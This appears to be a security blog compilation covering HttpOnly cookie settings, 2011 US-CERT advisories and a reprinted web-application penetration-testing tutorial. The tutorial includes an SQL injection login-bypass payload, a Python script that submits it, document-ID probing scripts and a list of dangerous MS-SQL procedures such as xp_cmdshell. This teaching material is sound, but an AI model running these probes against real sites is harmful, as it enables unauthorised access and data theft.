If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.

If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the HttpOnly flag will be ignored by the browser, thus creating a traditional, script-accessible cookie. As a result, the cookie (typically your session cookie) becomes vulnerable to theft or modification by malicious script [2].

Mitigating the Most Common XSS attack using HttpOnly

According to Michael Howard, Senior Security Program Manager in the Secure Windows Initiative group at Microsoft, the majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client.

If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website [3].

Using Java to Set HttpOnly

Sun Java EE supports the HttpOnly flag in the Cookie interface since version 6 (Servlet 3.0) [4], also for session cookies (JSESSIONID) [5]. The methods setHttpOnly and isHttpOnly can be used to set and check the HttpOnly value of a cookie.

For older versions, the workaround is to rewrite the JSESSIONID value, setting it as a custom header [6].

String sessionid = request.getSession().getId();
response.setHeader("SET-COOKIE", "JSESSIONID=" + sessionid + "; HttpOnly");

In Tomcat 6, set the flag useHttpOnly="true" in context.xml to force this behaviour for applications [7], including Tomcat-based frameworks like JBoss [8].

Servlet 3.0 (Java EE 6) introduced a standard way to configure the HttpOnly attribute for the session cookie; this can be done by applying the following configuration in web.xml:

<session-config>
 <cookie-config>
  <http-only>true</http-only>
 </cookie-config>
</session-config>
Using .NET to Set HttpOnly
  • By default, .NET 2.0 sets the HttpOnly attribute for
    1. Session ID
    2. Forms Authentication cookie


In .NET 2.0, HttpOnly can also be set via the HttpCookie object for all custom application cookies

  • Via web.config in the system.web/httpCookies element
<httpCookies httpOnlyCookies="true" …> 
  • Or programmatically

C# Code:

HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);

VB.NET Code:

Dim myCookie As HttpCookie = new HttpCookie("myCookie")
myCookie.HttpOnly = True
Response.AppendCookie(myCookie)
  • However, in .NET 1.1, you would have to do this manually, e.g.,
Response.Cookies[cookie].Path += ";HttpOnly";
Using PHP to Set HttpOnly

PHP supports setting the HttpOnly flag since version 5.2.0 (November 2006).

For session cookies managed by PHP, the flag is set either permanently in php.ini (see the PHP manual on HttpOnly) through the parameter:

session.cookie_httponly = True

or at runtime during a script via the function [9]:

void session_set_cookie_params  ( int $lifetime  [, string $path  [, string $domain  
                                  [, bool $secure= false  [, bool $httponly= false  ]]]] )

For application cookies, the last parameter of setcookie() sets the HttpOnly flag [10]:

bool setcookie  ( string $name  [, string $value  [, int $expire= 0  [, string $path  
                 [, string $domain  [, bool $secure= false  [, bool $httponly= false  ]]]]]] )
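
The OWASP page does not cover Python, but for comparison, here is a minimal sketch using the standard http.cookies module (web frameworks typically expose the same flag as an httponly argument to their set-cookie helpers):

from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "361873127da673c"
cookie["sessionid"]["httponly"] = True
cookie["sessionid"]["secure"] = True

# Produces a header value like: sessionid=361873127da673c; HttpOnly; Secure
print(cookie["sessionid"].OutputString())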

Web Application Firewalls

If code changes are infeasible, web application firewalls can be used to add HttpOnly to session cookies:

  • Mod_security - using SecRule and Header directives[11]
  • ESAPI WAF[12] using add-http-only-flag directive[13]

Browsers Supporting HttpOnly

Using WebGoat's HttpOnly lesson, the following web browsers have been tested for HttpOnly support. If the browser enforces HttpOnly, a client side script will be unable to read or write the session cookie. However, many browsers do not prevent reading or writing the session cookie via an XMLHttpRequest.

Note: These results may be out of date as this page is not well maintained. A great site that is focused on keeping up with the status of browsers is at: http://www.browserscope.org/. For the most recent security status of various browsers, including many details beyond just HttpOnly, go to the browserscope site, and then click on the Security Tab on the table at the bottom of the page. The Browserscope site does not provide as much detail on HttpOnly as this page, but provides lots of other details this page does not.

Our results as of Feb 2009 are listed below in table 1.

Table 1: Browsers Supporting HttpOnly
Browser (version) | Prevents Reads | Prevents Writes | Prevents Read within XMLHTTPResponse*
Microsoft Internet Explorer 8 Beta 2 | Yes | Yes | Partially (set-cookie is protected, but not set-cookie2, see [14]); fully patched IE8 passes http://ha.ckers.org/httponly.cgi
Microsoft Internet Explorer 7 | Yes | Yes | Partially (set-cookie is protected, but not set-cookie2, see [15]); fully patched IE7 passes http://ha.ckers.org/httponly.cgi
Microsoft Internet Explorer 6 (SP1) | Yes | No | No (possible that ms08-069 fixed IE 6 too, please verify with http://ha.ckers.org/httponly.cgi and update this page!)
Microsoft Internet Explorer 6 (fully patched) | Yes | Unknown | Yes
Mozilla Firefox 3.0.0.6+ | Yes | Yes | Yes (see [16])
Netscape Navigator 9.0b3 | Yes | Yes | No
Opera 9.23 | No | No | No
Opera 9.50 | Yes | No | No
Opera 11 | Yes | Unknown | Yes
Safari 3.0 | No | No | No (almost yes, see [17])
Safari 5 | Yes | Yes | Yes
iPhone (Safari) iOS 4 | Yes | Yes | Yes
Google Chrome Beta (initial public release) | Yes | No | No (almost yes, see [18])
Google Chrome 12 | Yes | Yes | Yes
Android 2.3 | Unknown | Unknown | No

* An attacker could still read the session cookie in a response to an XmlHttpRequest.

As of 2011, 99% of browsers and most web application frameworks support HttpOnly (see "Misunderstandings on HttpOnly Cookie").

Using WebGoat to Test for HttpOnly Support

The goal of this section is to provide a step-by-step example of testing your browser for HttpOnly support.

WARNING

The OWASP WEBGOAT HttpOnly lab is broken and does not show IE 8 Beta 2 with ms08-069 as complete in terms of HttpOnly XMLHTTPRequest header leakage protection. This error is being tracked via http://code.google.com/p/webgoat/issues/detail?id=18.

Getting Started

Figure 1 - Accessing WebGoat's HttpOnly Test Lesson

Assuming you have installed and launched WebGoat, begin by navigating to the ‘HttpOnly Test’ lesson located within the Cross-Site Scripting (XSS) category. After loading the ‘HttpOnly Test’ lesson, as shown in figure 1, you are now able to begin testing web browsers for HttpOnly support.

Lesson Goal

If the HttpOnly flag is set, then your browser should not allow a client-side script to access the session cookie. Unfortunately, since the attribute is relatively new, several browsers may neglect to handle the new attribute properly.

The purpose of this lesson is to test whether your browser supports the HttpOnly cookie flag. Note the value of the unique2u cookie. If your browser supports HTTPOnly, and you enable it for a cookie, a client-side script should NOT be able to read OR write to that cookie, but the browser can still send its value to the server. However, some browsers only prevent client side read access, but do not prevent write access.

Testing Web Browsers for HttpOnly Support

The following test was performed on two browsers, Internet Explorer 7 and Opera 9.22, to demonstrate the results when the HttpOnly flag is enforced properly. As you will see, IE7 properly enforces the HttpOnly flag, whereas Opera does not properly enforce the HttpOnly flag.

Disabling HttpOnly
1) Select the option to turn HttpOnly off as shown below in figure 2.
Figure 2 - Disabling HttpOnly
2) After turning HttpOnly off, select the “Read Cookie” button. 
  • An alert dialog box will display on the screen notifying you that since HttpOnly was not enabled, the ‘unique2u’ cookie was successfully read as shown below in figure 3.
Figure 3 - Cookie Successfully Read with HttpOnly Off
3) With HttpOnly remaining disabled, select the “Write Cookie”  button.
  • An alert dialog box will display on the screen notifying you that since HttpOnly was not enabled, the ‘unique2u’ cookie was successfully modified on the client side as shown below in figure 4.
Figure 4 - Cookie Successfully Written with HttpOnly Off
  • As you have seen thus far, browsing without HttpOnly on is a potential threat. Next, we will enable HttpOnly to demonstrate how this flag protects the cookie.
Enabling HttpOnly
4) Select the radio button to enable HttpOnly as shown below in figure 5.
Figure 5 - Enabling HttpOnly
5) After enabling HttpOnly, select the "Read Cookie" button.
  • If the browser enforces the HttpOnly flag properly, an alert dialog box will display only the session ID rather than the contents of the ‘unique2u’ cookie as shown below in figure 6.
Figure 6 - Enforced Cookie Read Protection
  • However, if the browser does not enforce the HttpOnly flag properly, an alert dialog box will display both the ‘unique2u’ cookie and session ID as shown below in figure 7.
Figure 7 - Unenforced Cookie Read Protection
  • Finally, we will test if the browser allows write access to the cookie with HttpOnly enabled.
6) Select the "Write Cookie" button.
  • If the browser enforces the HttpOnly flag properly, client side modification will be unsuccessful in writing to the ‘unique2u’ cookie and an alert dialog box will display only containing the session ID as shown below in figure 8.
Figure 8 - Enforced Cookie Write Protection
  • However, if the browser does not enforce the write protection property of HttpOnly flag for the ‘unique2u’ cookie, the cookie will be successfully modified to HACKED on the client side as shown below in figure 9.
Figure 9 - Unenforced Cookie Write Protection
Posted by CEOinIRVINE

Security Advisory

Hacking 2011. 12. 5. 02:17

Adobe Releases Security Advisory for Adobe Flex SDK

added December 1, 2011 at 10:44 am

Adobe has released a security advisory to alert users of a vulnerability that affects Adobe Flex SDK. This vulnerability affects Adobe Flex SDK 4.5.1 and earlier 4.X and 3.6 and earlier 3.X for Windows, Macintosh, and Linux operating systems. Exploitation of this vulnerability may allow an attacker to perform a cross-site scripting attack within the Adobe Flex SDK application.

US-CERT encourages users and administrators to review the Adobe Security Bulletin and apply any necessary updates to mitigate the risk.


Google Releases Chrome 15.0.874.121

added November 17, 2011 at 02:23 pm

Google has released Chrome 15.0.874.121 for Linux, Mac, Windows, and Chrome Frame to address a vulnerability. This vulnerability allows an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 15.0.874.121.


Internet Systems Consortium Releases BIND-P1 Patches

added November 17, 2011 at 11:27 am

The Internet Systems Consortium has released updates for BIND to address a vulnerability. This vulnerability may allow an attacker to cause a denial-of-service condition. Please refer to the Internet Systems Consortium advisory for additional information.

US-CERT recommends that administrators of this product apply the respective patches for BIND 9.8.1-P1, 9.7.4-P1, 9.6-ESV-R5-P1, and 9.4-ESV-R5-P1 or check with their software vendors for updated versions.


Apple Releases iTunes 10.5.1

added November 15, 2011 at 09:25 am

Apple has released iTunes 10.5.1 to address a vulnerability. This vulnerability may allow an attacker to conduct a man-in-the-middle attack that could lead a user to click on a forged link believed to have originated from Apple.

US-CERT encourages users and administrators to review Apple article HT5030 and apply any necessary updates to help mitigate the risks.


Fraudulent Digital Certificates Could Allow Spoofing

added November 10, 2011 at 04:25 pm | updated November 14, 2011 at 02:48 pm

US-CERT is aware of public reports that DigiCert Sdn. Bhd* has issued 22 certificates with weak encryption keys. This could allow an attacker to use these certificates to impersonate legitimate site owners. DigiCert Sdn. Bhd has revoked all the weak certificates that they issued. Entrust, the parent Certificate Authority to DigiCert Sdn. Bhd, has released a statement containing more information.

Mozilla has released Firefox 8 and Firefox 3.6.24 to address this issue. Additional information can be found in the Mozilla Security Blog.

Microsoft has provided an update for all supported versions of Microsoft Windows to address this issue. Additional information can be found in Microsoft Security Advisory 2641690.

US-CERT encourages users and administrators to apply any necessary updates to help mitigate the risks. US-CERT will provide additional information as it becomes available.

*DigiCert Sdn. Bhd is not affiliated in any way with the US-based corporation DigiCert, Inc.


Adobe Releases Security Advisory for Adobe Flash Player and Adobe AIR

added November 11, 2011 at 09:30 am

Adobe has released a security advisory to alert users of vulnerabilities affecting Adobe Flash Player and Adobe AIR. These vulnerabilities affect Adobe Flash Player 11.0.1.152 and earlier versions for Windows, Macintosh, Linux, Solaris, Adobe Flash Player 11.0.1.153 for Android, and Adobe AIR 3.0 for Windows, Macintosh, and Android. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition.

US-CERT encourages users and administrators to review the Adobe Security Bulletin and apply any necessary updates to help mitigate the risk.


Apple Releases iOS 5.0.1

added November 10, 2011 at 04:16 pm

Apple has released iOS 5.0.1 for the iPhone 3GS, iPhone 4, iPhone 4S, iPod 3rd generation or later, iPad, and iPad 2 to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code or obtain sensitive information.

US-CERT encourages users and administrators to review Apple Support Article HT5052 and apply any necessary updates to help mitigate the risk.


Google Releases Chrome 15.0.874.120

added November 10, 2011 at 03:23 pm

Google has released Chrome 15.0.874.120 for Linux, Mac, Windows, and Chrome Frame to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 15.0.874.120.


Operation Ghost Click Malware

added November 10, 2011 at 12:52 pm

On November 9, 2011 US Federal prosecutors announced Operation Ghost Click, an ongoing investigation that resulted in the arrests of a cyber ring of seven people who allegedly ran a massive online advertising fraud scheme that used malicious software to infect at least 4 million computers in more than 100 countries.

The cyber ring, comprised of individuals from Estonia and Russia, allegedly used the malicious software, or malware, to hijack web searches to generate advertising and sales revenue by diverting users from legitimate websites to websites run by the cyber ring. In some cases, the software, known as DNSChanger, would replace advertising on popular websites with other ads when viewed from an infected computer. The malware also could have prevented users' anti-virus software from functioning properly, thus exposing infected machines to unrelated malicious software.

US-CERT encourages users and administrators to use caution when surfing the web and to take the following preventative measures to protect themselves from malware campaigns:

  • Refer to the FBI's announcement of Operation Ghost Click for additional information on how to protect yourself and recover from DNSChanger attacks.
  • Maintain up-to-date antivirus software.
  • Configure your web browser as described in the Securing Your Web Browser document.
  • Do not follow unsolicited web links in email messages.
  • Use caution when opening email attachments. Refer to the Using Caution with Email Attachments Cyber Security Tip for more information on safely handling email attachments.
Posted by CEOinIRVINE

Web Penetration Testings

Hacking 2011. 12. 4. 13:10



Note: It is assumed that the reader of this article has some knowledge of the HTTP protocol - specifically, the format of HTTP GET and POST requests, and the purpose of various header fields. This information is available in RFC2616.

Web applications are becoming more prevalent and increasingly more sophisticated, and as such they are critical to almost all major online businesses. As with most security issues involving client/server communications, Web application vulnerabilities generally stem from improper handling of client requests and/or a lack of input validation checking on the part of the developer.

The very nature of Web applications - their ability to collate, process and disseminate information over the Internet - exposes them in two ways. First and most obviously, they have total exposure by nature of being publicly accessible. This makes security through obscurity impossible and heightens the requirement for hardened code. Second and most critically from a penetration testing perspective, they process data elements from within HTTP requests - a protocol that can employ a myriad of encoding and encapsulation techniques.

Most Web application environments (including ASP and PHP, which will both be used for examples throughout the series), expose these data elements to the developer in a manner that fails to identify how they were captured and hence what kind of validation and sanity checking should apply to them. Because the Web "environment" is so diverse and contains so many forms of programmatic content, input validation and sanity checking is the key to Web applications security. This involves both identifying and enforcing the valid domain of every user-definable data element, as well as a sufficient understanding of the source of all data elements to determine what is potentially user definable.

The Root of the Issue: Input Validation

Input validation issues can be difficult to locate in a large codebase with lots of user interactions, which is the main reason that developers employ penetration testing methodologies to expose these problems. Web applications are, however, not immune to the more traditional forms of attack. Poor authentication mechanisms, logic flaws, unintentional disclosure of content and environment information, and traditional binary application flaws (such as buffer overflows) are rife. When approaching a Web application as a penetration tester, all this must be taken into account, and a methodical process of input/output or "blackbox" testing, in addition to (if possible) code auditing or "whitebox" testing, must be applied.

What exactly is a Web application?

A Web application is an application, generally comprising a collection of scripts, that resides on a Web server and interacts with databases or other sources of dynamic content. They are fast becoming ubiquitous as they allow service providers and their clients to share and manipulate information in an (often) platform-independent manner via the infrastructure of the Internet. Some examples of Web applications include search engines, Webmail, shopping carts and portal systems.

How does it look from the users perspective?

Web applications typically interact with the user via FORM elements and GET or POST variables (even a 'Click Here' button is usually a FORM submission). With GET variables, the inputs to the application can be seen within the URL itself; however with POST requests it is often necessary to study the source of form-input pages (or capture and decode valid requests) in order to determine the user's inputs.

An example HTTP request that might be provided to a typical Web application is as follows:

GET /sample.php?var=value&var2=value2 HTTP/1.1 | HTTP-METHOD REQUEST-URI PROTOCOL/VERSION
Session-ID: 361873127da673c | Session-ID Header
Host: www.webserver.com | Host Header
<CR><LF><CR><LF> | Two carriage return line feeds

Every element of this request can potentially be used by the Web application processing the request. The REQUEST-URI identifies the unit of code that will be invoked along with the query string: an &-separated list of variable=value pairs defining input parameters. This is the main form of Web applications input. The Session-ID header provides a token identifying the client's established session as a primitive form of authentication. The Host header is used to distinguish between virtual hosts sharing the same IP address and will typically be parsed by the Web server, but is, in theory, within the domain of the Web application.

As a penetration tester you must use all input methods available to you in order to elicit exception conditions from the application. Thus, you cannot be limited to what a browser or automatic tools provide. It is quite simple to script HTTP requests using utilities like curl, or shell scripts using netcat. The process of exhaustive blackbox testing a Web application is one that involves exploring each data element, determining the expected input, manipulating or otherwise corrupting this input, and analysing the output of the application for any unexpected behaviour.
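
As a minimal illustration (any language with a socket API works equally well), the following Python sketch sends a hand-crafted version of the example request above, so that every header and parameter is under the tester's control:

import socket

def raw_request(host, payload, port=80):
    # Send a hand-crafted HTTP request and collect the full response.
    s = socket.create_connection((host, port))
    s.sendall(payload.encode())
    chunks = []
    while True:
        data = s.recv(4096)
        if not data:
            break
        chunks.append(data)
    s.close()
    return b"".join(chunks).decode(errors="replace")

request = ("GET /sample.php?var=value&var2=value2 HTTP/1.1\r\n"
           "Host: www.webserver.com\r\n"
           "Session-ID: 361873127da673c\r\n"
           "Connection: close\r\n\r\n")
print(raw_request("www.webserver.com", request))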

The Information Gathering Phase

Fingerprinting the Web Application Environment

One of the first steps of the penetration test should be to identify the Web application environment, including the scripting language and Web server software in use, and the operating system of the target server. All of these crucial details are simple to obtain from a typical Web application server through the following steps:

1. Investigate the output from HEAD and OPTIONS HTTP requests

The header and any page returned from a HEAD or OPTIONS request will usually contain a SERVER: string or similar detailing the Web server software version and possibly the scripting environment or operating system in use.

OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 Jun 2003 11:02:45 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

2. Investigate the format and wording of 404/other error pages

Some application environments (such as ColdFusion) have customized and therefore easily recognizable error pages, and will often give away the software versions of the scripting language in use. The tester should deliberately request invalid pages and utilize alternate request methods (POST/PUT/Other) in order to glean this information from the server.

Below is an example of a ColdFusion 404 error page:

3. Test for recognised file types/extensions/directories

Many Web services (such as Microsoft IIS) will react differently to a request for a known and supported file extension than an unknown extension. The tester should attempt to request common file extensions such as .ASP, .HTM, .PHP, .EXE and watch for any unusual output or error codes.

GET /blah.idq HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 Jun 2003 11:12:24 GMT
Content-Type: text/html

<HTML>The IDQ file blah.idq could not be found.

4. Examine source of available pages

The source code from the immediately accessible pages of the application front-end may give clues as to the underlying application environment.

<title>Home Page</title>
<meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
<meta content="C#" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">

In this situation, the developer appears to be using MS Visual Studio 7. The underlying environment is likely to be Microsoft IIS 5.0 with .NET framework.

5. Manipulate inputs in order to elicit a scripting error

In the example below the most obvious variable (ItemID) has been manipulated to fingerprint the Web application environment:

6. TCP/ICMP and Service Fingerprinting
Using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tools Amap and WebServerFP, the penetration tester can gain a more accurate idea of the underlying operating systems and Web application environment than through many other methods. Nmap and Queso examine the nature of the host's TCP/IP implementation to determine the operating system and, in some cases, the kernel version and patch level. Application fingerprinting tools rely on data such as Server HTTP headers to identify the host's application software.

Hidden form elements and source disclosure

In many cases developers require inputs from the client that should be protected from manipulation, such as a user-variable that is dynamically generated and served to the client, and required in subsequent requests. In order to prevent users from seeing and possibly manipulating these inputs, developers use form elements with a HIDDEN tag. Unfortunately, this data is in fact only hidden from view on the rendered version of the page - not within the source.

There have been numerous examples of poorly written ordering systems that would allow users to save a local copy of order confirmation pages, edit HIDDEN variables such as price and delivery costs, and resubmit their request. The Web application would perform no further authentication or cross-checking of form submissions, and the order would be dispatched at a discounted price!

<FORM METHOD="LINK" ACTION="/shop/checkout.htm">
<INPUT TYPE="HIDDEN" name="quoteprice" value="4.25">Quantity: <INPUT TYPE="text"
NAME="totalnum"> <INPUT TYPE="submit" VALUE="Checkout">
</FORM>

This practice is still common on many sites, though to a lesser degree. Typically only non-sensitive information is contained in HIDDEN fields, or the data in these fields is encrypted. Regardless of the sensitivity of these fields, they are still another input to be manipulated by the blackbox penetration tester.

All source pages should be examined (where feasible) to determine if any sensitive or useful information has been inadvertently disclosed by the developer - this may take the form of active content source within HTML, pointers to included or linked scripts and content, or poor file/directory permissions on critical source files. Any referenced executables and scripts should be probed, and if accessible, examined.

Javascript and other client-side code can also provide many clues as to the inner workings of a Web application. This is critical information when blackbox testing. Although the whitebox (or 'code-auditing') tester has access to the application's logic, to the blackbox tester this information is a luxury which can provide for further avenues of attack. For example, take the following chunk of code:

<INPUT TYPE="SUBMIT" onClick="
if (document.forms['product'].elements['quantity'].value >= 255) {
document.forms['product'].elements['quantity'].value='';
alert('Invalid quantity');
return false;
} else {
return true;
}
">

This suggests that the application is trying to protect the form handler from quantity values of 255 or more - the maximum value of a tinyint field in most database systems. It would be trivial to bypass this piece of client-side validation, insert a long integer value into the 'quantity' GET/POST variable, and see if this elicits an exception condition from the application.
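
For instance, a request that skips the page's JavaScript check entirely can be scripted in a few lines; the URL and field name below are hypothetical stand-ins for the form above:

import urllib.parse, urllib.request

# Hypothetical form handler and field, following the example form above.
data = urllib.parse.urlencode({"quantity": "4294967296"}).encode()
req = urllib.request.Request("http://www.webserver.com/shop/product.asp", data)
with urllib.request.urlopen(req) as resp:
    body = resp.read().decode(errors="replace")

# Inspect the response for scripting errors or database exceptions.
print(body[:500])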

Determining Authentication Mechanisms

One of the biggest shortcomings of the Web applications environment is its failure to provide a strong authentication mechanism. Of even more concern is the frequent failure of developers to apply what mechanisms are available effectively. It should be explained at this point that the term Web applications environment refers to the set of protocols, languages and formats - HTTP, HTTPS, HTML, CSS, JavaScript, etc. - that are used as a platform for the construction of Web applications. HTTP provides two forms of authentication: Basic and Digest. These are both implemented as a series of HTTP requests and responses, in which the client requests a resource, the server demands authentication and the client repeats the request with authentication credentials. The difference is that Basic authentication is clear text and Digest authentication encrypts the credentials using a nonce (time sensitive hash value) provided by the server as a cryptographic key.

Besides the obvious problem of clear text credentials when using Basic, there is nothing inherently wrong with HTTP authentication, and this clear-text problem can be mitigated by using HTTPS. The real problem is twofold. First, since this authentication is applied by the Web server, it is not easily within the control of the Web application without interfacing with the Web server's authentication database. Therefore custom authentication mechanisms are frequently used. These open a veritable Pandora's box of issues in their own right. Second, developers often fail to correctly assess every avenue for accessing a resource and then apply authentication mechanisms accordingly.

Given this, penetration testers should attempt to ascertain both the authentication mechanism that is being used and how this mechanism is being applied to every resource within the Web application. Many Web programming environments offer session capabilities, whereby a user provides a cookie or a Session-ID HTTP header containing a pseudo-unique string identifying their authentication status. This can be vulnerable to attacks such as brute forcing, replay, or re-assembly if the string is simply a hash or concatenated string derived from known elements.

Every attempt should be made to access every resource via every entry point. This will expose problems where a root level resource such as a main menu or portal page requires authentication but the resources it in turn provides access to do not. An example of this is a Web application providing access to various documents as follows. The application requires authentication and then presents a menu of documents the user is authorised to access, each document presented as a link to a resource such as:

http://www.server.com/showdoc.asp?docid=10

Although reaching the menu requires authentication, the showdoc.asp script requires no authentication itself and blindly provides the requested document, allowing an attacker to simply insert the docid GET variable of his choice and retrieve the document. As elementary as it sounds, this is a common flaw in the wild.
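
A quick way to confirm this class of flaw is to request the resource directly with no session at all; a sketch against the example URL above (the docid range is arbitrary):

import urllib.error, urllib.request

# Probe showdoc.asp without any session cookie; if documents come back,
# the script performs no authentication of its own.
for docid in range(1, 21):
    url = "http://www.server.com/showdoc.asp?docid=%d" % docid
    try:
        with urllib.request.urlopen(url) as resp:
            print(docid, resp.status, len(resp.read()))
    except urllib.error.HTTPError as err:
        print(docid, err.code)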

Conclusions

In this article we have presented the penetration tester with an overview of web applications and how web developers obtain and handle user inputs. We have also shown the importance of fingerprinting the target environment and developing an understanding of the back-end of an application. Equipped with this information, the penetration tester can proceed to targeted vulnerability tests and exploits. The next installment in this series will introduce code and content-manipulation attacks, such as PHP/ASP code injection, SQL injection, Server-Side Includes and Cross-site scripting.

http://www.securityfocus.com/infocus/1704

Penetration Testing for Web Applications (Part Two)
by Jody Melbourne and David Jorm
last updated July 3, 2003

Our first article in this series covered user interaction with Web applications and explored the various methods of HTTP input that are most commonly utilized by developers. In this second installment we will be expanding upon issues of input validation - how developers routinely, through a lack of proper input sanity and validity checking, expose their back-end systems to server-side code-injection and SQL-injection attacks. We will also investigate the client-side problems associated with poor input-validation such as cross-site scripting attacks.

The Blackbox Testing Method

The blackbox testing method is a technique for hardening and penetration-testing Web applications where the source code to the application is not available to the tester. It forces the penetration tester to look at the Web application from a user's perspective (and therefore, an attacker's perspective). The blackbox tester uses fingerprinting methods (as discussed in Part One of this series) to probe the application and identify all expected inputs and interactions from the user. The blackbox tester, at first, tries to get a 'feel' for the application and learn its expected behavior. The term blackbox refers to this Input/UnknownProcess/Output approach to penetration testing.

The tester attempts to elicit exception conditions and anomalous behavior from the Web application by manipulating the identified inputs - using special characters, white space, SQL keywords, oversized requests, and so forth. Any unexpected reaction from the Web application is noted and investigated. This may take the form of scripting error messages (possibly with snippets of code), server errors (HTTP 500), or half-loaded pages.


Figure 1 - Blackbox testing GET variables

Any strange behavior on the part of the application, in response to strange inputs, is certainly worth investigating as it may mean the developer has failed to validate inputs correctly!

SQL Injection Vulnerabilities

Many Web application developers (regardless of the environment) do not properly strip user input of potentially "nasty" characters before using that input directly in SQL queries. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Locating SQL Injection Vulnerabilities

Often the most effective method of locating SQL injection vulnerabilities is by hand - studying application inputs and inserting special characters. With many of the popular backends, informative error pages are displayed by default, which can often give clues to the SQL query in use: when attempting SQL injection attacks, you want to learn as much as possible about the syntax of database queries.


Figure 2 - Potential SQL injection vulnerability


Figure 3 - Another potential SQL injection hole

Example: Authentication bypass using SQL injection

This is one of the most commonly used examples of an SQL injection vulnerability, as it is easy to understand for non-SQL-developers and highlights the extent and severity of these vulnerabilities. One of the simplest ways to validate a user on a Web site is by providing them with a form, which prompts for a username and password. When the form is submitted to the login script (eg. login.asp), the username and password fields are used as variables within an SQL query.

Examine the following code (using MS Access DB as our backend):

user = Request.form("user")
pass = Request.form("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open (dsn)
SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"
rs.open (sql,conn) if rs.eof or rs.bof then
response.write "Database Error"
else
if rs("C") < 1 then
response.write "Invalid Credentials"
else
response.write "Logged In"
end if
end if

In this scenario, no sanity or validity checking is being performed on the user and pass variables from our form inputs. The developer may have client-side (eg. Javascript) checks on the inputs, but as has been demonstrated in the first part of this series, any attacker who understands HTML can bypass these restrictions. If the attacker were to submit the following credentials to our login script:

user: test' OR '1'='1
pass: test

the resulting SQL query would look as follows:

SELECT C=COUNT(*) FROM users where pass='test' and user='test' OR '1'='1'

In plain English, "access some data where user and pass are equal to 'test', or 1 is equal to 1." As the second condition is always true, the first condition is irrelevant, and the query data is returned successfully - in this case, logging the attacker into the application.

For recent examples of this class of vulnerability, please refer to http://www.securityfocus.com/bid/4520 and http://www.securityfocus.com/bid/4931. Both of these advisories detail SQL authentication issues similar to the above.
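
A blackbox test for this flaw simply submits the payload and inspects the response; here is a short sketch in Python, assuming the example login.asp form above:

import urllib.parse, urllib.request

# The classic bypass credentials from the example above.
payload = {"user": "test' OR '1'='1", "pass": "test"}
data = urllib.parse.urlencode(payload).encode()
with urllib.request.urlopen("http://www.server.com/login.asp", data) as resp:
    body = resp.read().decode(errors="replace")

print("vulnerable" if "Logged In" in body else "not obviously vulnerable")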

MS-SQL Extended stored procedures

Microsoft SQL Server 7 supports the loading of extended stored procedures (a procedure implemented in a DLL that is called by the application at runtime). Extended stored procedures can be used in the same manner as database stored procedures, and are usually employed to perform tasks related to the interaction of the SQL server with its underlying Win32 environment. MSSQL has a number of built-in XSPs - most of these stored procedures are prefixed with an xp_.

Some of the built-in functions useful to the MSSQL pen-tester:

* xp_cmdshell - execute shell commands
* xp_enumgroups - enumerate NT user groups
* xp_logininfo - current login info
* xp_grantlogin - grant login rights
* xp_getnetname - returns WINS server name
* xp_regdeletekey - registry manipulation
* xp_regenumvalues
* xp_regread
* xp_regwrite
* xp_msver - SQL server version info

A non-hardened MS-SQL server may allow the DBO user to access these potentially dangerous stored procedures (which are executed with the permissions of the SQL server instance - in many cases, with SYSTEM privileges).

There are many extended/stored procedures that should not be accessible to any user other than the DB owner. A comprehensive list can be found at MSDN: http://msdn.microsoft.com/library/default...._sp_00_519s.asp

A well-maintained guide to hardening MS-SQL Server 7 and 2000 can be found at SQLSecurity.com: http://www.sqlsecurity.com/DesktopDefault....index=3&tabid=4

PHP and MySQL Injection

A vulnerable PHP Web application with a MySQL backend can be manipulated in much the same way as the ASP application above, even though PHP (with magic_quotes enabled) escapes a number of 'special' characters. MySQL offers no direct shell execution equivalent to MSSQL's xp_cmdshell, but in many cases an attacker can still append arbitrary conditions to queries, or use UNIONs and subselects to access or modify records in the database.
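As a brief sketch of the UNION technique (the script, table and column names here are hypothetical, and the era's mysql_* API is assumed), consider a product page that interpolates a numeric parameter directly into its query:

<?php
// hypothetical products.php - $_GET['id'] is used in a numeric context,
// so magic_quotes offers no protection: no quote characters are needed
$id = $_GET['id'];
$result = mysql_query("SELECT name, price FROM products WHERE id = $id");
while ($row = mysql_fetch_row($result)) {
    echo $row[0] . ' costs ' . $row[1] . '<br>';
}
?>

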